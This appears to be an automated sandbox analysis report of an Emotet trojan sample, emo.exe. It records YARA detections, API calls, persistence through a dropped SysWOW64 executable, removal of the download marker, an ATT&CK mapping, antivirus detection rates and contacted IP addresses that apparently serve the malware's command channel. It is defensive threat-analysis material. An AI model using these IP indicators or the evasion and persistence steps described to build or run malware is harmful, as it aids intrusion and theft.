Source: svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000C.00000003.757418980.000001C187579000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000C.00000003.757282534.000001C187588000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000C.00000003.757418980.000001C187579000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 0000000C.00000003.757418980.000001C187579000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000000C.00000003.752083104.000001C1875A3000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.751946560.000001C18756F000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.751988650.000001C18758A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.751968399.000001C18757E000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: emo.exe, 00000000.00000002.655468027.0000000002718000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0.2.emo.exe.41d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emo.exe.26f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspcolorer.exe.2d60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.aspcolorer.exe.2520000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.emo.exe.41d0000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.2.emo.exe.26f0000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 5.2.aspcolorer.exe.2d60000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 6.2.aspcolorer.exe.2520000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly

Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_041B2000 memcpy,NtAllocateVirtualMemory,	0_2_041B2000
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_041B1EF0 memcpy,NtProtectVirtualMemory,	0_2_041B1EF0
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_041B2E50 NtdllDefWindowProc_A,	0_2_041B2E50
Source: C:\Windows\SysWOW64\aspcolorer.exe	Code function: 5_2_02D41EF0 memcpy,NtProtectVirtualMemory,	5_2_02D41EF0
Source: C:\Windows\SysWOW64\aspcolorer.exe	Code function: 5_2_02D42000 memcpy,NtAllocateVirtualMemory,	5_2_02D42000
Source: C:\Windows\SysWOW64\aspcolorer.exe	Code function: 5_2_02D42E50 NtdllDefWindowProc_A,	5_2_02D42E50

Source: C:\Users\user\Desktop\emo.exe

File deleted: C:\Windows\SysWOW64\aspcolorer.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_041D56EF	0_2_041D56EF
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_041D56EF	0_2_041D56EF
Source: C:\Windows\SysWOW64\aspcolorer.exe	Code function: 5_2_02D656EF	5_2_02D656EF
Source: C:\Windows\SysWOW64\aspcolorer.exe	Code function: 5_2_02D656EF	5_2_02D656EF

Source: emo.exe, 00000000.00000002.655115671.0000000000427000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamec_gb18030.< vs emo.exe
Source: emo.exe, 00000001.00000002.672316266.0000000004920000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs emo.exe
Source: emo.exe, 00000001.00000002.672473752.0000000004A20000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs emo.exe
Source: emo.exe, 00000001.00000002.672473752.0000000004A20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs emo.exe
Source: emo.exe, 00000001.00000002.669263129.0000000000427000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamec_gb18030.< vs emo.exe
Source: emo.exe	Binary or memory string: OriginalFilenamec_gb18030.< vs emo.exe

Source: emo.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 0.2.emo.exe.41d0000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.2.emo.exe.26f0000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 5.2.aspcolorer.exe.2d60000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 6.2.aspcolorer.exe.2520000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload

Source: classification engine

Classification label: mal92.troj.evad.winEXE@10/0@0/6

Source: C:\Users\user\Desktop\emo.exe

Code function: 0_2_041D1C10 CreateToolhelp32Snapshot,

0_2_041D1C10

Source: C:\Windows\SysWOW64\aspcolorer.exe	Mutant created: \BaseNamedObjects\PEM1B60
Source: C:\Users\user\Desktop\emo.exe	Mutant created: \Sessions\1\BaseNamedObjects\PEM1A2C
Source: C:\Windows\SysWOW64\aspcolorer.exe	Mutant created: \BaseNamedObjects\PEM238
Source: C:\Users\user\Desktop\emo.exe	Mutant created: \Sessions\1\BaseNamedObjects\PEMD60

Source: emo.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\emo.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\emo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: emo.exe	Virustotal: Detection: 91%
Source: emo.exe	Metadefender: Detection: 70%
Source: emo.exe	ReversingLabs: Detection: 96%

Source: unknown	Process created: C:\Users\user\Desktop\emo.exe 'C:\Users\user\Desktop\emo.exe'
Source: C:\Users\user\Desktop\emo.exe	Process created: C:\Users\user\Desktop\emo.exe C:\Users\user\Desktop\emo.exe
Source: unknown	Process created: C:\Windows\SysWOW64\aspcolorer.exe C:\Windows\SysWOW64\aspcolorer.exe
Source: C:\Windows\SysWOW64\aspcolorer.exe	Process created: C:\Windows\SysWOW64\aspcolorer.exe C:\Windows\SysWOW64\aspcolorer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\emo.exe	Process created: C:\Users\user\Desktop\emo.exe C:\Users\user\Desktop\emo.exe	Jump to behavior
Source: C:\Windows\SysWOW64\aspcolorer.exe	Process created: C:\Windows\SysWOW64\aspcolorer.exe C:\Windows\SysWOW64\aspcolorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\emo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: emo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: sNQ.pdb source: emo.exe

Source: C:\Users\user\Desktop\emo.exe

Code function: 0_2_041D1A36 LoadLibraryA,GetProcAddress,

0_2_041D1A36

Source: emo.exe

Static PE information: section name: CONST

Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_00408205 pushfd ; iretd	0_2_00408237
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_00407A3B push ecx; iretd	0_2_00407A3D
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_004080C9 push 224E4EE2h; ret	0_2_004080DF
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_004096D2 push E9197B2Dh; iretd	0_2_004096E0
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_004092A2 push ecx; iretd	0_2_004092B7
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_00407B69 push eax; ret	0_2_00407B6A
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_0040B376 push esp; retf	0_2_0040B39C
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_0040B9D2 push cs; ret	0_2_0040BA3E
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_0040ABEE push 6EC3F474h; ret	0_2_0040AC03
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_0040A582 push ds; ret	0_2_0040A5C9
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_00408F8B push esp; iretd	0_2_00408F99
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_0040B5A6 pushad ; iretd	0_2_0040B5A7
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_0040A5B5 push ds; ret	0_2_0040A5C9

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\aspcolorer.exe

Executable created and started: C:\Windows\SysWOW64\aspcolorer.exe

Jump to behavior

Source: C:\Users\user\Desktop\emo.exe

PE file moved: C:\Windows\SysWOW64\aspcolorer.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\emo.exe

File opened: C:\Windows\SysWOW64\aspcolorer.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\emo.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\aspcolorer.exe

API coverage: 8.7 %

Source: C:\Windows\System32\svchost.exe TID: 6724

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\emo.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\emo.exe

Code function: 0_2_004015E7 GetSystemInfo,GetSystemInfo,GetConsoleProcessList,GetConsoleProcessList,GetSysColor,GetMenuState,GetThreadPriority,GetThreadPriority,IsDlgButtonChecked,

0_2_004015E7

Source: svchost.exe, 00000007.00000002.685718519.0000021F24340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.728069382.000001D457940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.744126595.0000026507D40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.770516884.000001C187C00000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 0000000C.00000002.769713427.000001C186CE7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.685718519.0000021F24340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.728069382.000001D457940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.744126595.0000026507D40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.770516884.000001C187C00000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000007.00000002.685718519.0000021F24340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.728069382.000001D457940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.744126595.0000026507D40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.770516884.000001C187C00000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.685718519.0000021F24340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.728069382.000001D457940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.744126595.0000026507D40000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.770516884.000001C187C00000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\emo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\emo.exe

Code function: 0_2_041D1A36 LoadLibraryA,GetProcAddress,

0_2_041D1A36

Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_041D1530 mov eax, dword ptr fs:[00000030h]	0_2_041D1530
Source: C:\Users\user\Desktop\emo.exe	Code function: 0_2_041D21B0 mov eax, dword ptr fs:[00000030h]	0_2_041D21B0
Source: C:\Windows\SysWOW64\aspcolorer.exe	Code function: 5_2_02D621B0 mov eax, dword ptr fs:[00000030h]	5_2_02D621B0
Source: C:\Windows\SysWOW64\aspcolorer.exe	Code function: 5_2_02D61530 mov eax, dword ptr fs:[00000030h]	5_2_02D61530

Source: C:\Users\user\Desktop\emo.exe

Code function: 0_2_041B22DA GetProcessHeap,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,

0_2_041B22DA

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\emo.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\aspcolorer.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\emo.exe

Code function: 0_2_041D277F RtlGetVersion,GetNativeSystemInfo,

0_2_041D277F

Source: C:\Windows\SysWOW64\aspcolorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0.2.emo.exe.41d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emo.exe.26f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspcolorer.exe.2d60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.aspcolorer.exe.2520000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\emo.exe

Code function: 0_2_004013DB OffsetRgn,AddClipboardFormatListener,DrawEdge,DrawEdge,DdeGetLastError,AnimateWindow,AllocConsole,NotifyUILanguageChange,SetMetaRgn,

0_2_004013DB

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection1	Masquerading11	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Hidden Files and Directories1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	System Information Discovery15	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
emo.exe	92%	Virustotal		Browse
emo.exe	70%	Metadefender		Browse
emo.exe	97%	ReversingLabs	Win32.Trojan.Emotet
emo.exe	100%	Avira	TR/Crypt.ZPACK.awz
emo.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.aspcolorer.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.awz	Download File
6.1.aspcolorer.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
0.2.emo.exe.26f03af.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.aspcolorer.exe.2d40000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.emo.exe.26f0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.emo.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1111422	Download File
0.2.emo.exe.41d0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.aspcolorer.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1111422	Download File
5.2.aspcolorer.exe.25c03af.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.emo.exe.26d0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.emo.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1111422	Download File
5.1.aspcolorer.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
5.2.aspcolorer.exe.2d60000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.aspcolorer.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1111422	Download File
6.2.aspcolorer.exe.2520000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.emo.exe.26b03af.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.emo.exe.41b0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.emo.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
1.0.emo.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.awz	Download File
6.0.aspcolorer.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.awz	Download File
6.2.aspcolorer.exe.2500000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.aspcolorer.exe.24d03af.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.emo.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.awz	Download File
0.1.emo.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://105.224.170.204/	7%	Virustotal		Browse
http://105.224.170.204/	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://105.224.170.204/	aspcolorer.exe, 00000006.00000002.916613045.000000000019C000.00000004.00000001.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.roblox.com/info/privacy	svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	false		high
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure	svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000000C.00000003.752083104.000001C1875A3000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.751946560.000001C18756F000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.751988650.000001C18758A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.751968399.000001C18757E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://en.help.roblox.com/hc/en-us	svchost.exe, 0000000C.00000003.757418980.000001C187579000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/parents/	svchost.exe, 0000000C.00000003.757282534.000001C187588000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 0000000C.00000003.757418980.000001C187579000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 0000000C.00000003.757418980.000001C187579000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.757275226.000001C187579000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.136.151.73	unknown	United States	33363	BHN-33363US	false
186.159.186.156	unknown	Costa Rica	52228	CableTicaCR	false
66.112.88.78	unknown	United States	22561	CENTURYLINK-LEGACY-LIGHTCOREUS	false
105.224.170.204	unknown	South Africa	37457	Telkom-InternetZA	false
200.54.111.170	unknown	Chile	52310	DercoSACL	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	465749
Start date:	16.08.2021
Start time:	08:31:56
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	emo.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@10/0@0/6
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 30.2% (good quality ratio 23%) Quality average: 60.2% Quality standard deviation: 40.2%
HCA Information:	Successful, ratio: 78% Number of executed functions: 31 Number of non-executed functions: 46
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.168.117.173, 23.211.6.115, 13.89.179.12, 20.82.210.154, 20.54.110.249, 40.112.88.60, 173.222.108.210, 173.222.108.226, 20.50.102.62, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:33:32	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.136.151.73	oBftD9JG5h.exe	Get hash	malicious	Browse
104.136.151.73	cVEAJou1VVpN.exe	Get hash	malicious	Browse
186.159.186.156	oBftD9JG5h.exe	Get hash	malicious	Browse
	knownconf.exe	Get hash	malicious	Browse
	Thanksgiving-Card.doc	Get hash	malicious	Browse
	Thanksgiving-Day-eCard.doc	Get hash	malicious	Browse
	cVEAJou1VVpN.exe	Get hash	malicious	Browse
66.112.88.78	oBftD9JG5h.exe	Get hash	malicious	Browse
66.112.88.78	cVEAJou1VVpN.exe	Get hash	malicious	Browse
105.224.170.204	oBftD9JG5h.exe	Get hash	malicious	Browse
200.54.111.170	knownconf.exe	Get hash	malicious	Browse	200.54.111.170/
	Thanksgiving-Card.doc	Get hash	malicious	Browse	200.54.111.170/
	cVEAJou1VVpN.exe	Get hash	malicious	Browse	200.54.111.170/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
BHN-33363US	PbttSF5mXT	Get hash	malicious	Browse	97.79.100.11
	ylq3OWuGzx	Get hash	malicious	Browse	97.102.236.200
	gP6rht35si	Get hash	malicious	Browse	96.58.97.59
	rq4MIQFAmU	Get hash	malicious	Browse	68.205.124.183
